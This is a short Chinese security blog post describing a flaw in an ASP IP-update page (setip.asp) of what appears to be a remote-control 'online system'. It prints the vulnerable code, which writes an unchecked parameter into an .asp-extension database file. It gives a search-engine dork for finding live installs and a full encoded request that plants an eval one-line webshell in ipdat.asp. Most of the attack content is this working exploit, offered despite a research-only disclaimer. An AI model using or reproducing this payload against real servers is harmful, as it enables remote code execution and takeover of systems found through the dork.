作者:toby57
在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshell
ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp
写入配置时对参数未作检查,setip.asp相关代码
<% strIP=Trim(Request.QueryString("Ip")) strPort=Trim(Request.QueryString("Port")) strType=Trim(Request.QueryString("Type")) if strType="0" then strIP=Request.ServerVariables("REMOTE_HOST") end if sql="select * from Info where strMark='Main'" rs.Open sql,conn,1,3 if not rs.eof or not rs.bof then rs("strIPAddress")=strIP rs("strPort")=strPort rs("strType")=strType rs.update '不要修改下面的反馈字符.否则程序不知道是否更新成功. response.write "update success!" else response.write "update fail!" end if set rs=nothing conn.close set conn=nothing
以“inurl:setip.asp”为关键字找了一个测试地址http://xxx.com/blackhole/setip.asp
提交
http://xxx.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7
这样就插入了EVAL一句话
ipdat.asp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论